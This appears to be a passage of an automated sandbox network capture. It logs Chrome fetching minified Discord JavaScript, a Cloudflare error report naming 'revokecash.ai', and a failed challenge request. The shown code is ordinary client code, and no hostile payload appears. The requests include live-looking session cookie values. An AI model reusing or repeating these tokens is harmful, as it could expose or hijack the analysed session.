                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 4c 4c 7d 29 5d 7d 29 7d 29 7d 7d 2c 38 35 35 38 39 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b 76 61 72 20 61 3d 6e 28 22 33 37 39 38 33 22 29 3b 6e 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 69 3d 6e 28 22 37 35 31 39 36 22 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 6c 65 74 7b 63 6f 6c 6f 72 3a 74 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 2e 2e 2e 6e 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 73 29 28 22 73 76 67 22 2c 7b 2e 2e 2e 28 30 2c 69 2e 64 65 66 61 75 6c 74 29 28 6e 29 2c 77 69 64 74 68 3a 22 31 36 22 2c 68 65 69 67 68 74 3a 22 31 36 22 2c
                                                                          Data Ascii: LL})]})})}},855891:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return r}});var a=n("37983");n("884691");var i=n("75196");function r(e){let{color:t="currentColor",...n}=e;return(0,a.jsxs)("svg",{...(0,i.default)(n),width:"16",height:"16",
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 75 74 68 6f 72 26 26 65 2e 61 75 74 68 6f 72 2e 69 64 3d 3d 3d 73 2e 50 55 42 4c 49 43 5f 47 55 49 4c 44 5f 55 50 44 41 54 45 53 5f 57 45 42 48 4f 4f 4b 5f 55 53 45 52 5f 49 44 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 6f 7d 6c 65 74 20 64 3d 65 3d 3e 7b 72 2e 64 65 66 61 75 6c 74 2e 74 72 61 63 6b 28 6c 2e 41 6e 61 6c 79 74 69 63 45 76 65 6e 74 73 2e 55 53 45 52 5f 46 4c 4f 57 5f 54 52 41 4e 53 49 54 49 4f 4e 2c 7b 66 6c 6f 77 5f 74 79 70 65 3a 73 2e 45 4e 41 42 4c 45 5f 43 4f 4d 4d 55 4e 49 54 59 5f 46 4c 4f 57 5f 4d 4f 44 41 4c 5f 4b 45 59 2c 66 72 6f 6d 5f 73 74 65 70 3a 65 2e 66 72 6f 6d 53 74 65 70 2c 74 6f 5f 73 74 65 70 3a 65 2e 74 6f 53 74 65 70 2c 2e 2e 2e 28 30 2c 61 2e 63 6f 6c 6c 65 63 74 47 75 69 6c 64 41 6e 61 6c 79 74
                                                                          Data Ascii: uthor&&e.author.id===s.PUBLIC_GUILD_UPDATES_WEBHOOK_USER_ID}function c(){return o}let d=e=>{r.default.track(l.AnalyticEvents.USER_FLOW_TRANSITION,{flow_type:s.ENABLE_COMMUNITY_FLOW_MODAL_KEY,from_step:e.fromStep,to_step:e.toStep,...(0,a.collectGuildAnalyt
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 28 22 32 33 33 37 33 36 22 29 2c 63 3d 6e 28 22 38 36 35 33 34 33 22 29 2c 64 3d 6e 28 22 35 38 37 39 30 34 22 29 2c 6d 3d 6e 28 22 34 39 31 31 31 22 29 2c 66 3d 6e 28 22 37 38 32 33 34 30 22 29 2c 67 3d 6e 28 22 36 33 32 32 31 35 22 29 2c 70 3d 6e 28 22 37 34 31 35 36 36 22 29 3b 66 75 6e 63 74 69 6f 6e 20 45 28 65 2c 74 29 7b 6c 65 74 7b 61 73 50 61 72 74 69 61 6c 50 72 65 76 69 65 77 3a 6e 3d 21 31 7d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 7b 7d 3b 69 66 28 65 2e 69 73 50 6f 6c 6c 28 29 26 26 6e 29 7b 76 61 72 20 61 2c 69 2c 72 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 72 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 65 2e 70 6f 6c
                                                                          Data Ascii: ("233736"),c=n("865343"),d=n("587904"),m=n("49111"),f=n("782340"),g=n("632215"),p=n("741566");function E(e,t){let{asPartialPreview:n=!1}=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{};if(e.isPoll()&&n){var a,i,r;return null!==(r=null===(i=e.pol
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 26 26 28 30 2c 61 2e 6a 73 78 73 29 28 61 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 22 20 22 2c 28 30 2c 61 2e 6a 73 78 29 28 64 2e 64 65 66 61 75 6c 74 2c 7b 74 69 6d 65 73 74 61 6d 70 3a 72 2e 65 64 69 74 65 64 54 69 6d 65 73 74 61 6d 70 2c 69 73 45 64 69 74 65 64 3a 21 30 2c 69 73 49 6e 6c 69 6e 65 3a 21 31 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 61 2e 6a 73 78 73 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 70 2e 65 64 69 74 65 64 2c 63 68 69 6c 64 72 65 6e 3a 5b 22 28 22 2c 66 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 4d 45 53 53 41 47 45 5f 45 44 49 54 45 44 2c 22 29 22 5d 7d 29 7d 29 5d 7d 29 5d 7d 29 7d 2c 53 29 7d 2c 35 38 37 39 30 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20
                                                                          Data Ascii: &&(0,a.jsxs)(a.Fragment,{children:[" ",(0,a.jsx)(d.default,{timestamp:r.editedTimestamp,isEdited:!0,isInline:!1,children:(0,a.jsxs)("span",{className:p.edited,children:["(",f.default.Messages.MESSAGE_EDITED,")"]})})]})]})},S)},587904:function(e,t,n){"use


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          348192.168.2.55008435.190.80.14435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:23 UTC476OUTPOST /report/v3?s=TMxqg5XRHDVa%2FCo9xlL8cpxYpnS5qnplAnvBGXOR5odnSCfdPvlUCGoJv1%2F8zuPD65ZHj2AJl%2FGafIs1WqLol2f%2F6o2BXiQilYt3lWPNsuxQVohkIByE4xZFLp%2FiI6Ys HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 792
                                                                          Content-Type: application/reports+json
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:23 UTC792OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 39 35 31 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 39 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 31 2e 32 32 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 76 6f 6b 65 63 61 73 68 2e 61 69
                                                                          Data Ascii: [{"age":49516,"body":{"elapsed_time":898,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.1.228","status_code":404,"type":"http.error"},"type":"network-error","url":"https://revokecash.ai
                                                                          2023-12-10 16:45:23 UTC168INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 33 20 47 4d 54 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                          Data Ascii: HTTP/1.1 200 OKContent-Length: 0date: Sun, 10 Dec 2023 16:45:23 GMTVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          349192.168.2.550085162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:23 UTC860OUTGET /assets/6377de1b7ec4e85ff431.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dUADPbAb8vBkHij6WYnb9DCSlaRQYa31enz.ClHakeY-1702226722245-0-604800000
                                                                          2023-12-10 16:45:23 UTC969INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 37 35 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 33 63 39 61 62 38 36 64 61 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:23 GMTContent-Type: application/javascriptContent-Length: 14756Connection: closeCF-Ray: 8336f53c9ab86da1-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:23 UTC400INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 31 31 39 36 30 22 5d 2c 7b 34 30 36 30 34 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 75 73 65 43 75 72 72 65 6e 74 55 73 65 72 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 44 69 73 61 62 6c 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 2c 75 73 65 72 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 44 69 73 61 62 6c 65 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["11960"],{406043:function(e,t,n){"use strict";n.r(t),n.d(t,{useCurrentUserCommunicationDisabled:function(){return o},default:function(){return d},userCommunicationDisabled:function(){r
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 65 6e 74 55 73 65 72 28 29 29 3b 72 65 74 75 72 6e 20 64 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 69 64 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 26 26 6e 75 6c 6c 21 3d 65 3f 6e 2e 67 65 74 4d 65 6d 62 65 72 28 74 2c 65 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 5b 6e 75 6c 6c 21 3d 3d 28 74 3d 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 44 69 73 61 62 6c 65 64 55 6e 74 69 6c 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 6e 75 6c 6c 2c 28 30 2c 69 2e 69 73 4d 65 6d 62 65 72 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 44 69 73 61 62 6c 65 64 29 28 65 29 5d 7d 66 75 6e 63 74 69 6f
                                                                          Data Ascii: entUser());return d(null==t?void 0:t.id,e)}function r(e,t,n){return null!=t&&null!=e?n.getMember(t,e):null}function s(e){var t;return[null!==(t=null==e?void 0:e.communicationDisabledUntil)&&void 0!==t?t:null,(0,i.isMemberCommunicationDisabled)(e)]}functio
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 79 70 65 2e 42 55 54 54 4f 4e 3a 69 66 28 45 2e 69 6e 63 6c 75 64 65 73 28 6e 29 26 26 6e 75 6c 6c 21 3d 74 2e 63 75 73 74 6f 6d 5f 69 64 26 26 70 2e 74 65 73 74 28 74 2e 63 75 73 74 6f 6d 5f 69 64 29 26 26 21 28 30 2c 64 2e 64 65 66 61 75 6c 74 29 28 6c 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 4c 3d 6e 75 6c 6c 21 3d 74 2e 65 6d 6f 6a 69 3f 66 28 74 2e 65 6d 6f 6a 69 2c 6f 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 7b 74 79 70 65 3a 75 2e 43 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 2e 42 55 54 54 4f 4e 2c 63 75 73 74 6f 6d 49 64 3a 74 2e 63 75 73 74 6f 6d 5f 69 64 2c 73 74 79 6c 65 3a 74 2e 73 74 79 6c 65 2c 64 69 73 61 62 6c 65 64 3a 74 2e 64 69 73 61 62 6c 65 64 2c 75 72 6c 3a 74 2e 75 72 6c 2c 6c 61 62 65 6c 3a 74 2e 6c 61 62 65 6c 2c 65 6d
                                                                          Data Ascii: ype.BUTTON:if(E.includes(n)&&null!=t.custom_id&&p.test(t.custom_id)&&!(0,d.default)(l))return null;let L=null!=t.emoji?f(t.emoji,o):void 0;return{type:u.ComponentType.BUTTON,customId:t.custom_id,style:t.style,disabled:t.disabled,url:t.url,label:t.label,em
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 53 65 6c 65 63 74 44 65 66 61 75 6c 74 56 61 6c 75 65 73 29 28 74 2e 64 65 66 61 75 6c 74 5f 76 61 6c 75 65 73 2c 6c 29 7d 3b 63 61 73 65 20 75 2e 43 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 2e 52 4f 4c 45 5f 53 45 4c 45 43 54 3a 72 65 74 75 72 6e 7b 74 79 70 65 3a 75 2e 43 6f 6d 70 6f 6e 65 6e 74 54 79 70 65 2e 52 4f 4c 45 5f 53 45 4c 45 43 54 2c 63 75 73 74 6f 6d 49 64 3a 74 2e 63 75 73 74 6f 6d 5f 69 64 2c 64 69 73 61 62 6c 65 64 3a 74 2e 64 69 73 61 62 6c 65 64 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 6e 75 6c 6c 21 3d 3d 28 43 3d 74 2e 70 6c 61 63 65 68 6f 6c 64 65 72 29 26 26 76 6f 69 64 20 30 21 3d 3d 43 3f 43 3a 63 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 4d 45 53 53 41 47 45 5f 53 45 4c 45 43 54 5f 43 4f 4d 50 4f 4e 45 4e 54 5f 44 45 46 41
                                                                          Data Ascii: SelectDefaultValues)(t.default_values,l)};case u.ComponentType.ROLE_SELECT:return{type:u.ComponentType.ROLE_SELECT,customId:t.custom_id,disabled:t.disabled,placeholder:null!==(C=t.placeholder)&&void 0!==C?C:c.default.Messages.MESSAGE_SELECT_COMPONENT_DEFA
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 6e 20 6e 75 6c 6c 7d 7d 29 2e 66 69 6c 74 65 72 28 65 3d 3e 6e 75 6c 6c 21 3d 65 29 7d 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 22 39 31 37 33 35 31 22 29 2c 61 3d 6e 2e 6e 28 6c 29 2c 75 3d 6e 28 22 37 39 38 36 30 39 22 29 2c 69 3d 6e 28 22 33 37 36 35 22 29 2c 6f 3d 6e 28 22 33 31 35 31 30 32 22 29 2c 72 3d 6e 28 22 31 39 32 31 31 32 22 29 2c 73 3d 6e 28 22 37 30 34 32 35 37 22 29 2c 64 3d 6e 28 22 39 38 38 38 37 38 22 29 2c 63 3d 6e 28 22 37 38 32 33 34 30 22 29 3b 6c 65 74 20 45 3d 5b 22 39 33 34 32 34 30 36 34 39 31 35 33 32 32 30 36 37 38 22 2c 22 39 33 36 39 32 39 35 36 31 33 30 32 36 37 35 34 35 36 22 2c 22 37 36 32 32 37 35 38 35 30 37 38 32 39 30 30 32 35 34 22 2c 22 31 30 32 32 39 35 32 31 39 35 31 39 34 33 35 39 38 38 39 22 5d 2c 70 3d 2f 4d 4a 3a
                                                                          Data Ascii: n null}}).filter(e=>null!=e)}}});var l=n("917351"),a=n.n(l),u=n("798609"),i=n("3765"),o=n("315102"),r=n("192112"),s=n("704257"),d=n("988878"),c=n("782340");let E=["934240649153220678","936929561302675456","762275850782900254","1022952195194359889"],p=/MJ:
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 7d 2c 67 65 74 53 6e 6f 77 66 6c 61 6b 65 53 65 6c 65 63 74 44 65 66 61 75 6c 74 56 61 6c 75 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 7d 29 2c 6e 28 22 32 32 32 30 30 37 22 29 3b 76 61 72 20 6c 3d 6e 28 22 33 37 34 31 35 38 22 29 2c 61 3d 6e 28 22 37 39 38 36 30 39 22 29 2c 75 3d 6e 28 22 34 32 32 30 33 22 29 2c 69 3d 6e 28 22 32 36 39 38 39 22 29 2c 6f 3d 6e 28 22 33 30 35 39 36 31 22 29 2c 72 3d 6e 28 22 36 39 37 32 31 38 22 29 2c 73 3d 6e 28 22 32 35 32 39 32 22 29 2c 64 3d 6e 28 22 33 38 37 31 31 31 22 29 2c 63 3d 6e 28 22 31 39 32 31 31 32 22 29 3b 6c 65 74 20 45 3d 31 65 33 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 6c 65 74 20 6c 3d 75 2e 64 65 66 61 75 6c 74
                                                                          Data Ascii: ction(){return f},getSnowflakeSelectDefaultValues:function(){return T}}),n("222007");var l=n("374158"),a=n("798609"),u=n("42203"),i=n("26989"),o=n("305961"),r=n("697218"),s=n("25292"),d=n("387111"),c=n("192112");let E=1e3;function p(e,t,n){let l=u.default
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 65 3d 3e 7b 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 20 6c 2e 53 6e 6f 77 66 6c 61 6b 65 53 65 6c 65 63 74 44 65 66 61 75 6c 74 56 61 6c 75 65 54 79 70 65 73 2e 55 53 45 52 3a 76 61 72 20 74 3b 6c 65 74 20 6f 3d 72 2e 64 65 66 61 75 6c 74 2e 67 65 74 55 73 65 72 28 65 2e 69 64 29 3b 69 66 28 6e 75 6c 6c 3d 3d 6f 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 73 3d 6e 75 6c 6c 21 3d 61 3f 69 2e 64 65 66 61 75 6c 74 2e 67 65 74 4e 69 63 6b 28 61 2e 69 64 2c 6f 2e 69 64 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 7b 74 79 70 65 3a 63 2e 53 65 6c 65 63 74 4f 70 74 69 6f 6e 54 79 70 65 2e 55 53 45 52 2c 76 61 6c 75 65 3a 6f 2e 69 64 2c 6c 61 62 65 6c 3a 6e 75 6c 6c 21 3d 3d 28 74 3d 6e 75 6c 6c 21 3d 73 3f 73 3a 6f 2e 67 6c 6f 62 61 6c 4e
                                                                          Data Ascii: e=>{switch(e.type){case l.SnowflakeSelectDefaultValueTypes.USER:var t;let o=r.default.getUser(e.id);if(null==o)return null;let s=null!=a?i.default.getNick(a.id,o.id):void 0;return{type:c.SelectOptionType.USER,value:o.id,label:null!==(t=null!=s?s:o.globalN
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 72 72 6f 72 4d 65 73 73 61 67 65 3a 6e 2c 65 72 72 6f 72 43 6f 64 65 3a 74 7d 29 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 77 61 69 74 20 6c 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 7b 75 72 6c 3a 75 2e 45 6e 64 70 6f 69 6e 74 73 2e 4d 45 53 53 41 47 45 5f 49 4e 54 45 52 41 43 54 49 4f 4e 5f 44 41 54 41 28 65 2c 74 29 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 3b 69 66 28 6e 2e 6f 6b 29 7b 6c 65 74 20 6c 3d 6e 2e 62 6f 64 79 3b 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4c 4f 41 44 5f 4d 45 53 53 41 47 45 5f 49 4e 54 45 52 41 43 54 49 4f 4e 5f 44 41 54 41 5f 53 55 43 43 45 53 53 22 2c 63 68 61 6e 6e 65 6c 49 64 3a 65 2c 6d 65 73 73 61 67 65 49 64 3a 74 2c 69 6e
                                                                          Data Ascii: rrorMessage:n,errorCode:t})}async function s(e,t){let n=await l.default.get({url:u.Endpoints.MESSAGE_INTERACTION_DATA(e,t),oldFormErrors:!0});if(n.ok){let l=n.body;a.default.dispatch({type:"LOAD_MESSAGE_INTERACTION_DATA_SUCCESS",channelId:e,messageId:t,in
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 4e 2c 6f 29 3b 6c 65 74 20 49 3d 7b 74 79 70 65 3a 73 2e 49 6e 74 65 72 61 63 74 69 6f 6e 54 79 70 65 73 2e 4d 45 53 53 41 47 45 5f 43 4f 4d 50 4f 4e 45 4e 54 2c 6e 6f 6e 63 65 3a 53 2c 67 75 69 6c 64 5f 69 64 3a 54 2c 63 68 61 6e 6e 65 6c 5f 69 64 3a 66 2c 6d 65 73 73 61 67 65 5f 66 6c 61 67 73 3a 6c 2c 6d 65 73 73 61 67 65 5f 69 64 3a 6e 2c 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 3a 72 2c 73 65 73 73 69 6f 6e 5f 69 64 3a 63 2e 64 65 66 61 75 6c 74 2e 67 65 74 53 65 73 73 69 6f 6e 49 64 28 29 2c 64 61 74 61 3a 7b 63 6f 6d 70 6f 6e 65 6e 74 5f 74 79 70 65 3a 74 2c 63 75 73 74 6f 6d 5f 69 64 3a 61 2c 2e 2e 2e 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 69 66 28 65 2e 74 79 70 65 3d 3d 3d 73 2e
                                                                          Data Ascii: N,o);let I={type:s.InteractionTypes.MESSAGE_COMPONENT,nonce:S,guild_id:T,channel_id:f,message_flags:l,message_id:n,application_id:r,session_id:c.default.getSessionId(),data:{component_type:t,custom_id:a,...function(e){if(null==e)return null;if(e.type===s.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          350192.168.2.550086162.159.138.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:23 UTC805OUTGET /cdn-cgi/challenge-platform/h/b/jsd/r/8336f4d76ab16db3 HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dUADPbAb8vBkHij6WYnb9DCSlaRQYa31enz.ClHakeY-1702226722245-0-604800000; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722
                                                                          2023-12-10 16:45:23 UTC817INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 50 54
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestDate: Sun, 10 Dec 2023 16:45:23 GMTContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: PT
                                                                          2023-12-10 16:45:23 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                          Data Ascii: 7invalid
                                                                          2023-12-10 16:45:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
